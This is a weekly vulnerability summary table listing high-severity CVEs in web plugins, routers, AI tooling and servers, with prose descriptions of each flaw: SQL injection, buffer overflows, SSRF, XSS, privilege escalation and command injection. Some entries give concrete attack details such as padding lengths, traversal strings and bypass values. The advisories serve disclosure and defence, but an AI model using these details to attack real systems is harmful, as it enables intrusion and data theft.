| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.6, in engine/luahandler.go, the sync.RWMutex protecting LoadCommonFunctions is released before L.Push() and L.PCall() execute. Since gopher-lua's LState is explicitly not goroutine-safe, concurrent requests race on the shared state causing Lua VM corruption. The Go race detector confirms this immediately under modest concurrency (ab -n 1000 -c 100). This vulnerability is fixed in 1.17.6. | 2026-05-26 | not yet calculated | CVE-2026-43981 | https://github.com/xyproto/algernon/security/advisories/GHSA-rr2f-4wrm-h6rg https://github.com/xyproto/algernon/issues/172 |
| xyproto--algernon | Algernon is a small self-contained pure-Go web server. Prior to 1.17.6, uploadedFileSaveIn() in lua/upload/upload.go uses filepath.Join() with the caller-supplied directory but performs no boundary check after joining. A directory of ../../../tmp resolves cleanly to /tmp, outside the web root. This vulnerability is fixed in 1.17.6. | 2026-05-26 | not yet calculated | CVE-2026-43982 | https://github.com/xyproto/algernon/security/advisories/GHSA-2j2c-pv62-mmcp https://github.com/xyproto/algernon/issues/172 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.44.0, When the server has called Server::set_trusted_proxies() with a non-empty trusted-proxy list, an attacker can send an HTTP request that includes an X-Forwarded-For header whose value parses to no valid IP segments. The code path then executes get_client_ip(), which calls front() on an empty std::vector-undefined behavior in C++. On typical implementations this manifests as abnormal process termination (denial of service). With Sanitizers enabled, you get an explicit runtime diagnostic. This vulnerability is fixed in 0.44.0. | 2026-05-29 | not yet calculated | CVE-2026-46527 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-hg3g-vrg8-578g |
| yoda-digital--mcp-gitlab-server | GitLab MCP Server lets an AI agent talk directly to GitLab. Prior to 0.6.0, the HTTP transport in src/transport.ts ships with no authentication layer at all and a wildcard Access-Control-Allow-Origin: * on every response. The structural defect is that the SSE server stands up a stateful, mutation-capable RPC endpoint that is backed by the operator's GITLAB_PERSONAL_ACCESS_TOKEN without any inbound credential check, then advertises itself to every cross-origin browser context via the wildcard CORS header. The httpServer.listen(port) call at line 97 also passes no host argument, so the bind defaults to 0.0.0.0 and exposes the auth-less surface on every interface. This vulnerability is fixed in 0.6.0. | 2026-05-26 | not yet calculated | CVE-2026-44895 | https://github.com/yoda-digital/mcp-gitlab-server/security/advisories/GHSA-8jr5-6gvj-rfpf |
| YVES--Sereal::Decoder | Sereal::Decoder versions before 5.005 for Perl allow heap out-of-bounds read via crafted input. In Perl/Decoder/srl_decoder.c, srl_read_object() and srl_read_hash() process a COPY tag, a back-reference whose target byte the decoder re-decodes as a fresh tag. When that target byte matches the SHORT_BINARY pattern (an inline string whose length is encoded in the low bits of the tag), the resulting read is not bounded to precede the COPY tag's own offset and can run past the end of the input buffer. An attacker controlled COPY offset can land inside a previously decoded value rather than on a tag boundary, planting a byte that the decoder reads as a SHORT_BINARY tag and consuming up to 31 following bytes from the heap as a class name (OBJECT path) or hash key (HASH path). | 2026-05-31 | not yet calculated | CVE-2026-8796 | https://github.com/Sereal/Sereal/commit/303a2c69cdba80bf37a3ff43461e0aa78198a7a3.patch https://metacpan.org/release/YVES/Sereal-Decoder-5.005/changes |
Vulnerability Summary for the Week of May 18, 2026
Posted on Tuesday May 26, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10-Strike--Network Inventory Explorer | 10-Strike Network Inventory Explorer 8.54 contains a stack-based buffer overflow vulnerability in the registration key input field that allows local attackers to execute arbitrary code by triggering a structured exception handler overwrite. Attackers can craft a malicious registration key string with 4188 bytes of padding followed by SEH chain values and shellcode, then paste it into the registration dialog to achieve code execution with application privileges. | 2026-05-23 | 8.4 | CVE-2018-25344 |
| 10-Strike--Network Scanner | 10-Strike Network Scanner 3.0 contains a local buffer overflow vulnerability in the host name field that allows attackers to bypass SafeSEH protections and execute arbitrary code. Attackers can craft a malicious payload in the host name or address field and trigger the vulnerability through the Trace route or System information functions to achieve code execution. | 2026-05-23 | 8.4 | CVE-2018-25345 |
| 10Web--Form Maker | WordPress Form Maker Plugin 1.12.24 and below contains SQL injection vulnerabilities that allow authenticated attackers to manipulate database queries by injecting SQL code through the FormMakerSQLMapping and generete_csv actions. Attackers can submit POST requests with malicious SQL payloads in the name and search_labels parameters to extract, modify, or escalate privileges within the WordPress database. | 2026-05-23 | 7.1 | CVE-2018-25346 |
| acyba--AcyMailing An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress | The AcyMailing - An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 10.8.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify privileged AcyMailing configuration, export subscriber secret keys, and chain these actions into administrator account takeover when a target administrator email address is known. | 2026-05-20 | 8.8 | CVE-2026-5200 |
| Alinto--SOGo Webmail | SOGo versions 5.12.7 and prior contains a SQL injection vulnerability in the Access Control List management functionality that allows authenticated users to extract arbitrary data from the database by injecting SQL subqueries through the uid parameter of the addUserInAcls endpoint. Attackers can inject malicious SQL code to write extracted data into the sogo_acl table and retrieve it through the /acls API, establishing an out-of-band data exfiltration channel. | 2026-05-18 | 8.1 | CVE-2026-8851 |
| Audiograbber--Audiograbber | Audiograbber 1.83 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting structured exception handling mechanisms. Attackers can craft malicious input in the Interpret or Album fields that triggers a buffer overflow, overwriting SEH pointers and executing injected shellcode with application privileges. | 2026-05-23 | 8.4 | CVE-2018-25355 |
| AWS--Amazon Braket Python SDK | Insecure deserialization in the job results processing component in Amazon Braket SDK before 1.117.0 might allow a remote authenticated user with S3 write access to the job output bucket to achieve arbitrary code execution on any machine that processes job results. We recommend you upgrade to amazon-braket-sdk version 1.117.0 or later. | 2026-05-22 | 7.1 | CVE-2026-9291 |
| AWS--Amazon Redshift connector for Python | Unsafe use of Python's eval() on server-received data in the vector_in() function in amazon-redshift-python-driver before 2.1.14 allows a rogue server or man-in-the-middle actor to execute arbitrary code on the client. To remediate this issue, users should upgrade to version 2.1.14. | 2026-05-18 | 9.8 | CVE-2026-8838 |
| AWS--Kiro CLI | Missing input source validation in the tool authorization prompt in Kiro CLI before 1.28.0 allows a local attacker to execute arbitrary tools, including shell commands, without user approval by crafting content that is piped to kiro-cli via stdin. We recommend you to upgrade to kiro-cli version 1.28.0 or later. | 2026-05-22 | 7.8 | CVE-2026-9255 |
| AWS--RabbitMQ AWS | Active debug code exists in the ARN resolver of amazon-mq rabbitmq-aws before version 0.2.1. A debug ARN scheme (arn:aws-debug:file) accepted by the PUT /api/aws/arn/validate validation endpoint might allow remote authenticated users to perform arbitrary file reads on any file accessible to the RabbitMQ process. To remediate this issue, customers should upgrade to version 0.2.1 of rabbitmq-aws. If RabbitMQ is configured to use TLS for connections, we also recommend rotating any associated private certificate keys. | 2026-05-20 | 7.7 | CVE-2026-9133 |
| baptisteArno--typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the preview chat endpoint (POST /api/v1/typebots/{typebotId}/preview/startChat) allows unauthenticated users to achieve Server-Side Request Forgery (SSRF) by supplying a custom typebot definition with server-side code blocks. The fetch function exposed inside the isolated-vm sandbox calls Node.js native fetch without the SSRF validation (validateHttpReqUrl) that protects the HTTP Request block. This bypasses all SSRF mitigations added after GHSA-8gq9-rw7v-3jpr. Exploitation of this unauthenticated SSRF vulnerability can lead to cloud credential theft, internal network access and data exfiltration for any self-hosted Typebot deployments and hosted services. This issue has been fixed in version 3.16.0. | 2026-05-22 | 10 | CVE-2026-33712 |
| baptisteArno--typebot.io | Typebot is a chatbot builder tool. In versions 3.15.2 and prior, the RatingButton component in the embed package renders the user-controlled customIcon.svg field directly via Solid's innerHTML directive without any sanitization, even though DOMPurify is already a dependency and is used elsewhere in the codebase (e.g., StreamingBubble.tsx). Because rating blocks are not flagged as isUnsafe by the import sanitizer and the builder preview renders bots inline on the builder's own origin (builder.typebot.io) under a CSP permitting 'unsafe-inline', a malicious imported or collaborator-crafted typebot can execute arbitrary HTML/JS in the builder's authenticated context, bypassing the Web Worker sandbox that protects Script blocks during preview. This allows session hijacking and privilege escalation within the builder application. This issue has been fixed in version 3.16.0. | 2026-05-22 | 8.7 | CVE-2026-28445 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions prior to 3.16.0, SSRF protection for Webhook / HTTP Request blocks validates only the URL string, blocked hostname literals, and literal IP formats. It does not resolve DNS before allowing the request. As a result, a hostname such as ssrf-repro.example that resolves to 127.0.0.1, 169.254.169.254, or RFC1918/private space passes validation and is later fetched by the backend HTTP client. This enables server-side request forgery to loopback, cloud metadata, and private network targets. This issue has been resolved in version 3.16.0. | 2026-05-22 | 7.6 | CVE-2026-34207 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain an SSRF via Open Redirect Bypass as the HTTP Request block and Code block validate the initial request URL via validateHttpReqUrl() to block private IPs and cloud metadata hostnames. However, the HTTP clients (ky and fetch) follow 302 redirects without re-validating the redirect destination. An authenticated user can point a bot block to an attacker-controlled server that responds with a redirect to an internal IP, causing the Typebot server to reach internal services. An authenticated Typebot user can reach AWS metadata (169.254.169.254), private subnets, and container-internal services. Exploitable to extract cloud IAM credentials or probe internal APIs inaccessible from the internet. This issue has been fixed in version 3.16.0. | 2026-05-22 | 7.7 | CVE-2026-39965 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the fix for GHSA-4xc5-wfwc-jw47 ("Credential Theft via Client-Side Script Execution and API Authorization Bypass") is incomplete. While the builder's getCredentials tRPC endpoint was patched with workspace membership checks, the bot-engine runtime still allows any authenticated user to use credentials from any workspace via the preview chat endpoint. The bot-engine's getCredentials() utility function uses a falsy check (if (workspaceId && ...)) for workspace ownership validation. Since the preview endpoint accepts a client-controlled workspaceId field and the Zod schema allows empty strings, an attacker can supply workspaceId: "" to bypass credential ownership verification entirely. Exploitation can result in credential exfiltration, external service abuse, financial damage and a data breach. | 2026-05-22 | 7.1 | CVE-2026-39968 |
| Basamak Information Technology Consulting and Organization Trade Ltd. Co.--DernekWeb | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Basamak Information Technology Consulting and Organization Trade Ltd. Co. DernekWeb allows Stored XSS. This issue affects DernekWeb: through 30122025. | 2026-05-18 | 8.8 | CVE-2026-7498 |
| Behance--Smartshop | Smartshop 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to category.php with UNION-based SQL injection payloads in the id parameter to extract sensitive database information including usernames and other data. | 2026-05-23 | 8.2 | CVE-2018-25340 |
| Behance--Smartshop | Smartshop 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to product.php with union-based SQL injection payloads in the id parameter to extract sensitive database information including usernames and database names. | 2026-05-23 | 8.2 | CVE-2018-25341 |
| Behance--Smartshop | Smartshop 1 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'searched' parameter in search.php. Attackers can send GET requests with malicious SQL payloads like SLEEP commands to extract sensitive database information including product details and system data. | 2026-05-23 | 8.2 | CVE-2018-25342 |
| BerriAI--litellm | LiteLLM prior to 1.83.14 allows an authenticated internal_user to create API keys with access to routes that their role does not permit. When generating a key, the allowed_routes field is stored without verifying that the specified routes fall within the user's own permissions. A key created with access to admin-only routes can then be used to reach those routes successfully, bypassing the role-based access controls that would otherwise block the request, enabling full privilege escalation from internal_user to proxy_admin. | 2026-05-21 | 8.8 | CVE-2026-47101 |
| BerriAI--litellm | LiteLLM prior to 1.83.10 allows a user to modify their own user_role via the /user/update endpoint. While the endpoint correctly restricts users to updating only their own account, it does not restrict which fields may be changed. A user who can reach this endpoint can set their role to proxy_admin, gaining full administrative access to LiteLLM including all users, teams, keys, models, and prompt history. Users with the org_admin role have legitimate access to this endpoint and can exploit this vulnerability without chaining any additional flaw. | 2026-05-21 | 8.8 | CVE-2026-47102 |
| Besen--BS20 EV Charging Station | A weakness has been identified in Besen BS20 EV Charging Station up to 20260426. Affected by this issue is some unknown functionality of the component OTA Update Installation Handler. This manipulation causes improper authorization. The attack is possible to be carried out remotely. A high degree of complexity is needed for the attack. The exploitation is known to be difficult. The original disclosure mentions, that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026." | 2026-05-24 | 8.1 | CVE-2026-9397 |
| bestpractical--rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 5.0.0 through 5.0.9 and 6.0.0 through 6.0.2 contain an SQL injection vulnerability. An authenticated user can craft input that is incorporated into database queries without proper validation, potentially allowing them to read or modify data in the RT database. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by restricting RT account access to trusted users. | 2026-05-22 | 8.8 | CVE-2026-41075 |
| bestpractical--rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 5.0.9 and prior in addition to 6.0.0 through 6.0.2 contain an authentication bypass vulnerability in RT installations that use LDAP/AD for user authentication. Under certain LDAP server configurations, an attacker may be able to authenticate as any LDAP-backed RT user without supplying valid credentials. This issue has been fixed in versions 5.0.10 and 6.0.3. If developers are unable to upgrade immediately, they can temporarily work around this issue by reviewing their LDAP server's authentication policy to ensure it rejects unauthenticated bind attempts. Upgrading RT remains the recommended fix. | 2026-05-22 | 8.1 | CVE-2026-41076 |
| bestpractical--rt | RT is an open source, enterprise-grade issue and ticket tracking system. Versions 6.0.0 through 6.0.2 contain a Cross-Site Request Forgery (CSRF) vulnerability. An attacker who can induce a logged-in RT user to visit a malicious web page can trigger arbitrary state-changing actions in RT on that user's behalf. This issue has been fixed in version 6.0.3. | 2026-05-22 | 7.1 | CVE-2026-41074 |
| Beyaz Computer Software Design Industry and Trade Ltd. Co.--CityPLus | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Beyaz Computer Software Design Industry and Trade Ltd. Co. CityPLus allows Reflected XSS. This issue affects CityPLus: before V24.29750.1.0. | 2026-05-20 | 7.6 | CVE-2026-5783 |
| beycanpress--Account Switcher | The Account Switcher plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.2. This is due to the `rememberLogin` REST API endpoint using a loose comparison (`!=` instead of `!==`) for secret validation at `app/RestAPI.php:111`, combined with no validation that the secret is non-empty. When a target user has never used the "Remember me" feature, their `asSecret` user meta does not exist, causing `get_user_meta()` to return an empty string. An attacker can send an empty `secret` parameter, which passes the comparison (`'' != ''` is `false`), and the endpoint then calls `wp_set_auth_cookie()` for the target user. Additionally, all REST routes use `permission_callback => '__return_true'` with no capability checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to switch to any user account including Administrator, ultimately granting themselves full administrative privileges. | 2026-05-20 | 8.8 | CVE-2026-6456 |
| Cisco--Cisco Secure Workload | A vulnerability in the access validation of internal REST APIs of Cisco Secure Workload could allow an unauthenticated, remote attacker to access site resources with the privileges of the Site Admin role. This vulnerability is due to insufficient validation and authentication when accessing REST API endpoints. An attacker could exploit this vulnerability if they are able to send a crafted API request to an affected endpoint. A successful exploit could allow the attacker to read sensitive information and make configuration changes across tenant boundaries with the privileges of the Site Admin user. | 2026-05-20 | 10 | CVE-2026-20223 |
| ConnectWise--Automate | The ConnectWise Automateâ„¢ Agent does not fully verify the authenticity of components obtained during plugin loading and self-update operations. This issue is addressed in Automate 2026.5. | 2026-05-21 | 8.8 | CVE-2026-9089 |
| constantcontact--Creative Mail Easier WordPress & WooCommerce Email Marketing | The Creative Mail - Easier WordPress & WooCommerce Email Marketing plugin for WordPress is vulnerable to SQL Injection via the 'checkout_uuid' parameter in all versions up to, and including, 1.6.9. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the `has_checkout_consent()` method. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 7.5 | CVE-2026-3985 |
| contest-gallery--Contest Gallery Upload & Vote Photos, Media, Sell with PayPal & Stripe | The Contest Gallery plugin for WordPress is vulnerable to SQL Injection via the 'form_input' parameter in versions up to, and including, 28.1.6. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query inside the unauthenticated 'post_cg_gallery_form_upload' AJAX action (specifically the 'cb' branch of the included users-upload-check.php, where $f_input_id is concatenated unquoted into 'SELECT Field_Content FROM ... WHERE id = $f_input_id'). The endpoint is gated only by a public frontend nonce ('cg1l_action' / 'cg_nonce') that is exposed in the page source of any public gallery page. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-19 | 7.5 | CVE-2026-8912 |
| cssigniterteam--AudioIgniter Music Player | The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. This is due to the handle_playlist_endpoint() function (hooked to template_redirect) accepting a user-controlled playlist ID via the audioigniter_playlist_id query var or the /audioigniter/playlist/{id}/ rewrite rule and returning playlist track data without performing any authentication, capability, or post_status check - only the post_type is validated. This makes it possible for unauthenticated attackers to view track metadata (titles, artists, audio URLs, buy links, download URLs, and cover images) of any playlist on the site, including those in draft, private, pending, or trash status. | 2026-05-22 | 7.5 | CVE-2026-8679 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the web-based installer (public/installer/index.php) is vulnerable to unauthenticated Remote Code Execution (RCE) because it performs the install.lock check only after including and executing form handler files, leaving installer endpoints reachable on already-installed instances. The handlers also pass unsanitized user input directly into shell commands, allowing an attacker to submit crafted requests that execute arbitrary commands on the server. The vulnerability stems from two combined weaknesses: (1) premature form handler execution before the lock file gate, and (2) unsafe use of user input in shell command construction. This issue is reported to be actively exploited in the wild. The issue has been fixed in version 1.2.0. | 2026-05-19 | 10 | CVE-2026-34234 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contain a Stored Cross-Site Scripting (XSS) vulnerability in the ticket reply notification system. Unsanitized reply content ($newmessage) is stored directly in database notification payloads and later rendered unescaped via Blade's {!! !!} syntax in the recipient's browser. The flaw exists in both App\Notifications\Ticket\Admin\AdminReplyNotification (triggered when a user replies, targeting admins) and App\Notifications\Ticket\User\ReplyNotification (triggered when an admin replies, targeting users), allowing arbitrary JavaScript execution in the victim's session context. A low-privileged attacker can exploit this to hijack admin sessions, harvest credentials via fake login prompts or keyloggers, and escalate privileges by performing administrative actions on the victim's behalf. The reverse path also enables a malicious or compromised admin to target regular users in the same manner. This issue has been fixed in version 1.2.0. | 2026-05-19 | 8.7 | CVE-2026-34241 |
| Ctrlpanel-gg--panel | CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contains a broken access control vulnerability where multiple admin controllers enforce permission checks on form display methods but omit equivalent checks on the corresponding write methods, allowing any authenticated user to bypass RBAC via direct POST/PATCH requests. Controllers missing checks on write methods store() and update() include ApplicationApiController (admin.api.write), CouponController (admin.coupons.write), PartnerController (admin.partners.write), ShopProductController (admin.store.write), UsefulLinkController (admin.useful_links.write), and VoucherController (admin.voucher.write); ProductController (admin.products.edit), ServerController (write/change_owner/change_identifier), and UserController (write/change_email/change_credits/change_username/change_password/change_role/change_referral/change_ptero/change_serverlimit) are missing checks on update() only, and ActivityLogController exposed empty stub store()/update() methods that silently accepted any request. An authenticated attacker without admin write privileges can issue API credentials, generate unlimited coupons and vouchers, assign arbitrary partner commission and discount rates, alter shop product pricing and limits, reassign server ownership or identifiers, and modify user accounts including roles, credits, passwords, and linked Pterodactyl IDs to achieve full privilege escalation, as well as abuse logBackIn() without the login_as permission to interfere with admin impersonation sessions. This issue has been fixed in version 1.2.0. | 2026-05-19 | 8.1 | CVE-2026-34358 |
| D-Link--DIR-601 | D-Link DIR601 2.02NA contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve sensitive configuration data by manipulating the table_name parameter in POST requests. Attackers can send requests to /my_cgi.cgi with table_name values like admin_user, wireless_settings, and wireless_security to extract administrative credentials and wireless network keys in clear text. | 2026-05-23 | 7.5 | CVE-2018-25358 |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) an Exposure of Information Through Directory Listing vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure. | 2026-05-20 | 7.5 | CVE-2025-32750 |
| Digital Operations Services Inc.--WifiBurada | Exposure of private personal information to an unauthorized actor, Insufficiently Protected Credentials vulnerability in Digital Operations Services Inc. WifiBurada allows Authentication Bypass. This issue affects WifiBurada: through 21052026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-21 | 7.1 | CVE-2025-13477 |
| Divi Engine--Divi Form Builder | The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled 'role' parameter from POST data during user registration without validating it against the form's configured default_user_role setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration. | 2026-05-21 | 9.8 | CVE-2026-5118 |
| Docker--Docker Desktop | The vllm-metal inference backend in Docker Model Runner on macOS unconditionally sets trust_remote_code=True when loading model tokenizers, and runs without sandboxing. This causes transformers.AutoTokenizer.from_pretrained() to import and execute arbitrary Python files included in any model pulled from an OCI registry, resulting in arbitrary code execution on the Docker host as the Docker Desktop user when inference is triggered. Any container on the Docker network can trigger this by calling the model-runner.docker.internal API to pull a malicious model and request inference. | 2026-05-22 | 8.2 | CVE-2026-5817 |
| Docker--Docker Desktop | The MLX inference backend in Docker Model Runner on macOS uses the MLX-LM library, which unconditionally imports and executes arbitrary Python files from model directories via the model_file configuration field in config.json. When a model's config.json specifies a model_file pointing to a Python file, MLX-LM uses importlib to load and execute it with no trust_remote_code gate or equivalent safety check. The MLX backend runs without sandboxing, resulting in arbitrary code execution on the Docker host as the Docker Desktop user. Any container on the Docker network can trigger this by calling the model-runner.docker.internal API to pull a malicious model from an attacker-controlled OCI registry and request inference. | 2026-05-22 | 8.2 | CVE-2026-5843 |
| Docker--Docker Desktop | The Docker CLI --use-api-socket flag bypasses Enhanced Container Isolation (ECI) restrictions in Docker Desktop. When ECI is enabled, Docker socket mounts from containers are denied unless explicitly allowed via the admin-settings configuration. However, the --use-api-socket flag adds the Docker socket mount via the HostConfig.Mounts field rather than the HostConfig.Binds field. The ECI enforcement in the Docker Desktop API proxy only inspected Binds, allowing the mount to pass unchecked. This grants a container full access to the Docker Engine socket and, if the host user has logged in to container registries, their authentication credentials. A local attacker with the ability to run Docker CLI commands can exploit this to escape ECI restrictions, access the Docker Engine, and potentially escalate privileges. | 2026-05-22 | 8.8 | CVE-2026-6406 |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). Versions 0.26.6 and below have OS command injection through the appName parameter. 3 chained issues cause this problem: inadequate input sanitization, lack of schema validation and direct shell interpolation. User-controlled application names are passed through inadequate sanitization (cleanAppName function only replaces spaces and converts to lowercase) before being interpolated directly into shell commands executed via execAsync() and execAsyncRemote(). An authenticated attacker can inject shell metacharacters (e.g., ;, $(), backticks, |, &) in the appName field during application creation, which are then executed with server-level privileges when service operations (start, stop, remove, scale) are triggered. This issue has been resolved in version 0.26.7. | 2026-05-18 | 9.9 | CVE-2026-27130 |
| Dolibarr--Dolibarr ERP CRM | Dolibarr ERP CRM 7.0.3 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting PHP code through the db_name parameter. Attackers can send a POST request to install/step1.php with malicious PHP code in the db_name parameter, then execute commands via the check.php endpoint using the cmd GET parameter. | 2026-05-23 | 9.8 | CVE-2018-25357 |
| Drupal--Drupal core | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Drupal Drupal core allows SQL Injection. This issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10. | 2026-05-20 | 9.8 | CVE-2026-9082 |
| DumbWareio--DumbAssets | DumbAssets through 1.0.11 contains a path traversal vulnerability in the POST /api/delete-file endpoint and filesToDelete array parameters that allows unauthenticated attackers to delete arbitrary files by supplying ../ sequences that bypass directory boundary validation. Attackers can exploit the optional and disabled-by-default authentication control to traverse outside the intended application directory and delete critical files such as server.js or package.json, causing complete denial of service. | 2026-05-18 | 9.1 | CVE-2026-45230 |
| Eclipse Foundation--Eclipse Glassfish | An authenticated Remote Code Execution (RCE) vulnerability was identified in GlassFish's Administration Console. A user with access to the panel can send crafted requests that allow the execution of arbitrary operating system commands with the privileges of the application service user. | 2026-05-19 | 9.1 | CVE-2026-2586 |
| Eclipse Foundation--Eclipse Glassfish | A critical Remote Code Execution (RCE) vulnerability was identified in the server-side template rendering mechanism used by the Glassfish gadget handler. The application processes .xml files and evaluates user-supplied values within a context where Expression Language (EL) "expressions" are processed without proper sanitization or escaping. By injecting expressions such as #{7*7}, the server returns 49, confirming server-side EL evaluation. This issue allows a remote attacker to fully compromise the underlying host, enabling capabilities as reading/modifying data, executing arbitrary commands, persistence, and lateral movement. | 2026-05-19 | 9.6 | CVE-2026-2587 |
| Edimax--BR-6428NS | A flaw has been found in Edimax BR-6428NS 1.10. This affects the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. This manipulation of the argument L2TPUserName causes buffer overflow. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 8.8 | CVE-2026-8775 |
| Edimax--BR-6428NS | A vulnerability has been found in Edimax BR-6428NS 1.10. This vulnerability affects the function formPPTPSetup of the file /goform/formPPTPSetup of the component POST Request Handler. Such manipulation of the argument pptpUserName leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 8.8 | CVE-2026-8776 |
| Edimax--BR-6428NS | A vulnerability was identified in Edimax BR-6428NS 1.10. The impacted element is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. Such manipulation of the argument pppUserName leads to buffer overflow. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 8.8 | CVE-2026-9294 |
| Edimax--BR-6428NS | A security flaw has been discovered in Edimax BR-6428NS 1.10. This affects the function formWirelessTbl of the file /goform/formWirelessTbl of the component POST Request Handler. Performing a manipulation of the argument vapurl results in buffer overflow. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 8.8 | CVE-2026-9295 |
| Edimax--BR-6675nD | A security vulnerability has been detected in Edimax BR-6675nD 1.12. Affected is the function formL2TPSetup of the file /goform/formL2TPSetup of the component POST Request Handler. Such manipulation of the argument L2TPUserName leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9380 |
| Edimax--BR-6675nD | A vulnerability was detected in Edimax BR-6675nD 1.12. Affected by this vulnerability is the function formPPPoESetup of the file /goform/formPPPoESetup of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9381 |
| Edimax--BR-6675nD | A flaw has been found in Edimax BR-6675nD 1.12. Affected by this issue is the function formPPTPSetup of the file /goform/formPPTPSetup of the component POST Request Handler. Executing a manipulation of the argument pptpUserName can lead to buffer overflow. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9382 |
| Edimax--BR-6675nD | A vulnerability was detected in Edimax BR-6675nD 1.12. This vulnerability affects the function formsetPPPoE of the file /goform/formsetPPPoE of the component POST Request Handler. Performing a manipulation of the argument pppUserName results in buffer overflow. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9399 |
| Edimax--BR-6675nD | A vulnerability has been found in Edimax BR-6675nD 1.12. Impacted is the function formWanTcpipSetup of the file /goform/formWanTcpipSetup of the component POST Request Handler. The manipulation of the argument pppUserName leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9401 |
| Edimax--BR-6675nD | A vulnerability was determined in Edimax BR-6675nD 1.12. The impacted element is the function formWlSiteSurvey of the file /goform/formWlSiteSurvey of the component POST Request Handler. This manipulation of the argument selSSID causes buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9403 |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn up to 1.31. The impacted element is an unknown function of the file /goform/formWpsStart of the component webs. Such manipulation of the argument pinCode/wlan-url leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 8.8 | CVE-2026-9344 |
